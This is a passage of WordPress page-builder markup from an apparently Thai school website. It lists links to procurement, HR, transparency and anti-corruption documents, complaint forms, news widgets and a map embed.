href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea 